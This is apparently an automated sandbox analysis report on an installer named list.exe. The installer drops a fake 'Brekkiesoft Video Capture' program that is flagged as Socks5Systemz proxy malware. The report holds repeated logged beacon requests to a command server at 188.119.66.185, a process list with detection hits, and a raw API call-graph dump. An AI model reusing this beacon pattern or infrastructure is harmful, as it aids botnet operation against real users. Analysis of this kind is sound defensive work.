17         | 192.168.2.7 | 49909       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:48 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:49 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:49 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
18         | 192.168.2.7 | 49915       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:51 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:52 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:52 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
19         | 192.168.2.7 | 49922       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:53 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:54 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:54 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
20         | 192.168.2.7 | 49928       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:56 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:56 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:56 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
21         | 192.168.2.7 | 49934       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:00:58 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:00:59 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:00:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:00:59 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
22         | 192.168.2.7 | 49944       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:01:01 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:01:02 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:01:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:01:02 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
23         | 192.168.2.7 | 49950       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:01:04 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:01:05 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:01:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:01:05 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
24         | 192.168.2.7 | 49956       | 188.119.66.185 | 443              | 7528 | C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-18 13:01:07 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 13:01:08 UTC | 200 | IN  | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 13:01:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 13:01:08 UTC | 24  | IN  | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Target ID:0
Start time:07:59:03
Start date:18/12/2024
Path:C:\Users\user\Desktop\list.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\list.exe"
Imagebase:0x400000
File size:3'575'195 bytes
MD5 hash:8EABEA9B74251FE67F24B87E54486643
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:2
Start time:07:59:03
Start date:18/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe"
Imagebase:0x400000
File size:706'560 bytes
MD5 hash:048F12CF9C44FE7D997B30F23A9A2228
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 4%, ReversingLabs
Reputation:low
Has exited:false

Target ID:3
Start time:07:59:04
Start date:18/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                      Imagebase:0x7ff63f6b0000
                                                                                                                                      File size:329'504 bytes
                                                                                                                                      MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:07:59:05
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:3'409'347 bytes
                                                                                                                                      MD5 hash:A5B9D0E5F04BC3D01C9E97A61F27EB8F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 38%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:07:59:06
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:07:59:06
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:07:59:09
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:09:47:57
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                      Imagebase:0x7ff7093d0000
                                                                                                                                      File size:468'120 bytes
                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:09:47:57
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true


Execution Graph

Execution Coverage:21.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:2.4%
Total number of Nodes:1520
Total number of Limit Nodes:22
execution_graph: [node/edge listing of the interactive call-graph viewer (function addresses, resolved Win32 API calls and call edges); not reproduced as text]
6106 406d5b 6104->6106 6105 406638 19 API calls 6107 406d87 6105->6107 6106->6101 6108 406a34 21 API calls 6106->6108 6109 40322c 4 API calls 6107->6109 6108->6101 6110 406d91 6109->6110 6111 4031b8 4 API calls 6110->6111 6112 406dab 6111->6112 6112->5976 6114 409244 6113->6114 6115 406638 19 API calls 6114->6115 6116 40925d 6115->6116 6117 40322c 4 API calls 6116->6117 6124 409268 6117->6124 6119 406978 20 API calls 6119->6124 6120 408dd8 18 API calls 6120->6124 6121 4033b4 18 API calls 6121->6124 6122 405890 18 API calls 6122->6124 6124->6119 6124->6120 6124->6121 6124->6122 6125 4092e4 6124->6125 6192 4091b0 6124->6192 6200 409034 6124->6200 6126 40322c 4 API calls 6125->6126 6127 4092ef 6126->6127 6128 4031b8 4 API calls 6127->6128 6129 409309 6128->6129 6130 403198 4 API calls 6129->6130 6131 409311 6130->6131 6131->5976 6133 4034f0 18 API calls 6132->6133 6135 406a6b 6133->6135 6134 406a82 GetEnvironmentVariableA 6134->6135 6136 406a8e 6134->6136 6135->6134 6139 406a95 6135->6139 6154 406dec 6135->6154 6138 403198 4 API calls 6136->6138 6138->6139 6139->6095 6149 406a34 6139->6149 6141 403414 6140->6141 6142 4068ab GetFullPathNameA 6141->6142 6143 4068b7 6142->6143 6144 4068ce 6142->6144 6143->6144 6145 4068bf 6143->6145 6146 40322c 4 API calls 6144->6146 6147 403278 18 API calls 6145->6147 6148 4068cc 6146->6148 6147->6148 6148->6105 6158 4069dc 6149->6158 6153 406ce9 6152->6153 6153->6097 6155 406dfa 6154->6155 6156 4034f0 18 API calls 6155->6156 6157 406e08 6156->6157 6157->6135 6165 406978 6158->6165 6160 4069fe 6161 406a06 GetFileAttributesA 6160->6161 6162 406a1b 6161->6162 6163 403198 4 API calls 6162->6163 6164 406a23 6163->6164 6164->6095 6175 406744 6165->6175 6167 4069b0 6170 4069c6 6167->6170 6171 4069bb 6167->6171 6169 406989 6169->6167 6182 406970 CharPrevA 6169->6182 6183 403454 6170->6183 6172 40322c 4 API calls 6171->6172 6174 4069c4 6172->6174 6174->6160 6179 406755 6175->6179 6176 4067b9 6177 406680 IsDBCSLeadByte 6176->6177 6178 4067b4 
6176->6178 6177->6178 6178->6169 6179->6176 6181 406773 6179->6181 6181->6178 6190 406680 IsDBCSLeadByte 6181->6190 6182->6169 6184 403486 6183->6184 6185 403459 6183->6185 6186 403198 4 API calls 6184->6186 6185->6184 6188 40346d 6185->6188 6187 40347c 6186->6187 6187->6174 6189 403278 18 API calls 6188->6189 6189->6187 6191 406694 6190->6191 6191->6181 6193 403198 4 API calls 6192->6193 6195 4091d1 6193->6195 6197 4091fe 6195->6197 6209 4032a8 6195->6209 6212 403494 6195->6212 6198 403198 4 API calls 6197->6198 6199 409213 6198->6199 6199->6124 6201 408f70 2 API calls 6200->6201 6202 40904a 6201->6202 6203 40904e 6202->6203 6216 406a48 6202->6216 6203->6124 6206 409081 6207 408fac Wow64RevertWow64FsRedirection 6206->6207 6208 409089 6207->6208 6208->6124 6210 403278 18 API calls 6209->6210 6211 4032b5 6210->6211 6211->6195 6213 403498 6212->6213 6215 4034c3 6212->6215 6214 4034f0 18 API calls 6213->6214 6214->6215 6215->6195 6217 4069dc 21 API calls 6216->6217 6218 406a52 GetLastError 6217->6218 6218->6206 6220 406744 IsDBCSLeadByte 6219->6220 6222 406835 6220->6222 6221 40687f 6221->5988 6222->6221 6223 406680 IsDBCSLeadByte 6222->6223 6223->6222 6225 4068f3 6224->6225 6226 406820 IsDBCSLeadByte 6225->6226 6228 4068fe 6226->6228 6227 4066ea 6227->5993 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 406957 6230->6231 6232 40695b 6230->6232 6231->6007 6235 406970 CharPrevA 6232->6235 6234 40696c 6234->6007 6235->6234 6810 408f30 6813 408dfc 6810->6813 6814 408e05 6813->6814 6815 403198 4 API calls 6814->6815 6816 408e13 6814->6816 6815->6814 6817 403932 6818 403924 6817->6818 6819 40374c VariantClear 6818->6819 6820 40392c 6819->6820 5380 4075c4 SetFilePointer 5381 4075f7 5380->5381 5382 4075e7 GetLastError 5380->5382 5382->5381 5383 4075f0 5382->5383 5385 40748c GetLastError 5383->5385 5388 4073ec 5385->5388 5389 407284 19 API calls 5388->5389 5390 407414 5389->5390 5391 407434 5390->5391 5392 405194 33 API calls 5390->5392 5393 405890 
18 API calls 5391->5393 5392->5391 5394 407443 5393->5394 5395 403198 4 API calls 5394->5395 5396 407460 5395->5396 5396->5381 6411 4076c8 WriteFile 6412 4076e8 6411->6412 6413 4076ef 6411->6413 6414 40748c 35 API calls 6412->6414 6415 407700 6413->6415 6416 4073ec 34 API calls 6413->6416 6414->6413 6416->6415 6417 402ccc 6420 402cfe 6417->6420 6421 402cdd 6417->6421 6418 402d88 RtlUnwind 6419 403154 4 API calls 6418->6419 6419->6420 6421->6418 6421->6420 6422 402b28 RaiseException 6421->6422 6423 402d7f 6422->6423 6423->6418 6829 403fcd 6830 403f07 4 API calls 6829->6830 6831 403fd6 6830->6831 6832 403e9c 4 API calls 6831->6832 6833 403fe2 6832->6833 6430 4024d0 6431 4024e4 6430->6431 6432 4024e9 6430->6432 6435 401918 4 API calls 6431->6435 6433 402518 6432->6433 6434 40250e RtlEnterCriticalSection 6432->6434 6437 4024ed 6432->6437 6445 402300 6433->6445 6434->6433 6435->6432 6438 402525 6441 402581 6438->6441 6442 402577 RtlLeaveCriticalSection 6438->6442 6440 401fd4 14 API calls 6443 402531 6440->6443 6442->6441 6443->6438 6444 40215c 9 API calls 6443->6444 6444->6438 6446 402314 6445->6446 6448 4023b8 6446->6448 6450 402335 6446->6450 6447 402344 6447->6438 6447->6440 6448->6447 6449 401d80 9 API calls 6448->6449 6453 402455 6448->6453 6455 401e84 6448->6455 6449->6448 6450->6447 6452 401b74 9 API calls 6450->6452 6452->6447 6453->6447 6454 401d00 9 API calls 6453->6454 6454->6447 6460 401768 6455->6460 6457 401e99 6458 401ea6 6457->6458 6459 401dcc 9 API calls 6457->6459 6458->6448 6459->6458 6461 401787 6460->6461 6462 40183b 6461->6462 6463 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6461->6463 6465 40132c LocalAlloc 6461->6465 6466 401821 6461->6466 6468 4017d6 6461->6468 6464 4015c4 VirtualAlloc 6462->6464 6469 4017e7 6462->6469 6463->6461 6464->6469 6465->6461 6467 40150c VirtualFree 6466->6467 6467->6469 6470 40150c VirtualFree 6468->6470 6469->6457 6470->6469 6471 4028d2 6472 4028da 6471->6472 6473 403554 4 API calls 6472->6473 6474 4028ef 
6472->6474 6473->6472 6475 4025ac 4 API calls 6474->6475 6476 4028f4 6475->6476 6834 4019d3 6835 4019ba 6834->6835 6836 4019c3 RtlLeaveCriticalSection 6835->6836 6837 4019cd 6835->6837 6836->6837 5397 407fd4 5398 407fe6 5397->5398 5400 407fed 5397->5400 5408 407f10 5398->5408 5402 408017 5400->5402 5404 408015 5400->5404 5407 408021 5400->5407 5401 40804e 5419 407d7c 5402->5419 5403 407d7c 33 API calls 5403->5401 5422 407e2c 5404->5422 5407->5401 5407->5403 5409 407f25 5408->5409 5410 407d7c 33 API calls 5409->5410 5411 407f34 5409->5411 5410->5411 5412 407f6e 5411->5412 5413 407d7c 33 API calls 5411->5413 5414 407f82 5412->5414 5415 407d7c 33 API calls 5412->5415 5413->5412 5418 407fae 5414->5418 5429 407eb8 5414->5429 5415->5414 5418->5400 5432 4058c4 5419->5432 5421 407d9e 5421->5407 5423 405194 33 API calls 5422->5423 5424 407e57 5423->5424 5440 407de4 5424->5440 5426 407e5f 5427 403198 4 API calls 5426->5427 5428 407e74 5427->5428 5428->5407 5430 407ec7 VirtualFree 5429->5430 5431 407ed9 VirtualAlloc 5429->5431 5430->5431 5431->5418 5434 4058d0 5432->5434 5433 405194 33 API calls 5435 4058fd 5433->5435 5434->5433 5436 4031e8 18 API calls 5435->5436 5437 405908 5436->5437 5438 403198 4 API calls 5437->5438 5439 40591d 5438->5439 5439->5421 5441 4058c4 33 API calls 5440->5441 5442 407e06 5441->5442 5442->5426 6477 405ad4 6478 405adc 6477->6478 6480 405ae4 6477->6480 6479 405aeb 6478->6479 6481 405ae2 6478->6481 6482 405940 19 API calls 6479->6482 6484 405a4c 6481->6484 6482->6480 6485 405a54 6484->6485 6486 405a6e 6485->6486 6489 403154 4 API calls 6485->6489 6487 405a73 6486->6487 6488 405a8a 6486->6488 6490 405940 19 API calls 6487->6490 6491 403154 4 API calls 6488->6491 6489->6485 6492 405a86 6490->6492 6493 405a8f 6491->6493 6495 403154 4 API calls 6492->6495 6494 4059b0 33 API calls 6493->6494 6494->6492 6496 405ab8 6495->6496 6497 403154 4 API calls 6496->6497 6498 405ac6 6497->6498 6498->6480 5910 40a9de 5911 40aa03 5910->5911 5912 407918 
InterlockedExchange 5911->5912 5913 40aa2d 5912->5913 5914 409ae8 18 API calls 5913->5914 5915 40aa3d 5913->5915 5914->5915 5920 4076ac SetEndOfFile 5915->5920 5917 40aa59 5918 4025ac 4 API calls 5917->5918 5919 40aa90 5918->5919 5921 4076c3 5920->5921 5922 4076bc 5920->5922 5921->5917 5923 40748c 35 API calls 5922->5923 5923->5921 6841 402be9 RaiseException 6842 402c04 6841->6842 6509 402af2 6510 402afe 6509->6510 6513 402ed0 6510->6513 6514 403154 4 API calls 6513->6514 6516 402ee0 6514->6516 6515 402b03 6516->6515 6518 402b0c 6516->6518 6519 402b25 6518->6519 6520 402b15 RaiseException 6518->6520 6519->6515 6520->6519 5448 40a5f8 5491 4030dc 5448->5491 5450 40a60e 5494 4042e8 5450->5494 5452 40a613 5497 40457c GetModuleHandleA GetProcAddress 5452->5497 5456 40a61d 5505 4065c8 5456->5505 5458 40a622 5514 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5458->5514 5468 40a665 5536 406c2c 5468->5536 5469 4031e8 18 API calls 5470 40a683 5469->5470 5550 4074e0 5470->5550 5476 407918 InterlockedExchange 5479 40a6d2 5476->5479 5477 40a710 5570 4074a0 5477->5570 5479->5477 5607 409ae8 5479->5607 5480 40a751 5574 407a28 5480->5574 5481 40a736 5481->5480 5482 409ae8 18 API calls 5481->5482 5482->5480 5484 40a776 5584 408b08 5484->5584 5488 40a7bc 5489 408b08 35 API calls 5488->5489 5490 40a7f5 5488->5490 5489->5488 5617 403094 5491->5617 5493 4030e1 GetModuleHandleA GetCommandLineA 5493->5450 5495 403154 4 API calls 5494->5495 5496 404323 5494->5496 5495->5496 5496->5452 5498 404598 5497->5498 5499 40459f GetProcAddress 5497->5499 5498->5499 5500 4045b5 GetProcAddress 5499->5500 5501 4045ae 5499->5501 5502 4045c4 SetProcessDEPPolicy 5500->5502 5503 4045c8 5500->5503 5501->5500 5502->5503 5504 404624 6FDA1CD0 5503->5504 5504->5456 5618 405ca8 5505->5618 5515 4090f7 5514->5515 5702 406fa0 SetErrorMode 5515->5702 5518 407284 19 API calls 5519 409127 5518->5519 5520 403198 4 API calls 5519->5520 5521 40913c 5520->5521 5522 409b78 GetSystemInfo 
